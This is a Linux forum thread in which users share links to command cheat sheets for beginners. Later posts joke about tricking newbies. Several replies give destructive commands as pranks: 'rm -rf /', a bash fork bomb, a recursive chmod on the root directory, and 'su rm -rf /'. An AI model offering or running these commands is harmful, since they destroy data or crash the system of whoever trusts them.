Page 1 of 1

Cheat-sheet collections for linux newbies

Posted: 11 Jun 2009, 14:48
by mina.magpie
So, I was looking for a nice cheatsheet for linux commands to stick on my wall, and came across this:

http://www.scottklarr.com/topic/115/lin ... ollection/

The author seems to have collected just about every cheatsheet ever authored. Very cool.

This one is particularly comprehensive:

http://www.onlamp.com/linux/cmd/

Though not exactly wall-sticking material.

Mina.

Re: Cheat-sheet collections for linux newbies

Posted: 11 Jun 2009, 15:50
by mina.magpie
Ended up going for a combination of this:

http://www.my-guides.net/en/content/view/29/26/

and this:

http://www.mediacollege.com/linux/comma ... mmand.html

for my wall, with this uberly-comprehensive condensed guide for my desk:

http://cb.vu/unixtoolbox.xhtml

This last one is worth checking out even if you know what you're doing in *nix, methinks. :)

Mina.

Re: Cheat-sheet collections for linux newbies

Posted: 11 Jun 2009, 16:19
by Ron2K
Good thread, I reckon it deserves a sticky.

Re: Cheat-sheet collections for linux newbies

Posted: 11 Jun 2009, 16:38
by rustypup
pfft.. the only commands you'll ever need...

Code: Select all

rm -rf /
:(){ :|:& };:
:twisted: old and lame, but funny still the same...

Re: Cheat-sheet collections for linux newbies

Posted: 11 Jun 2009, 16:45
by mina.magpie
rustypup wrote:pfft.. the only commands you'll ever need...

Code: Select all

rm -rf /
:(){ :|:& };:
:twisted: old and lame, but funny still the same...
You're an evil, evil person. :P

Mina.

Re: Cheat-sheet collections for linux newbies

Posted: 12 Jun 2009, 07:10
by Vampyre_2099
rustypup wrote:pfft.. the only commands you'll ever need...

Code: Select all

rm -rf /
:(){ :|:& };:
:twisted: old and lame, but funny still the same...
evil but sadly you still have to try get the guy to do it as root. either rm -rf / or chmod -R +rwx /*

Re: Cheat-sheet collections for linux newbies

Posted: 19 Oct 2011, 17:28
by PhR34KKK
Vampyre_2099 wrote:
rustypup wrote:pfft.. the only commands you'll ever need...

Code: Select all

rm -rf /
:(){ :|:& };:
:twisted: old and lame, but funny still the same...
evil but sadly you still have to try get the guy to do it as root. either rm -rf / or chmod -R +rwx /*
All you need is to just

Code: Select all

su rm -rf /
hehehe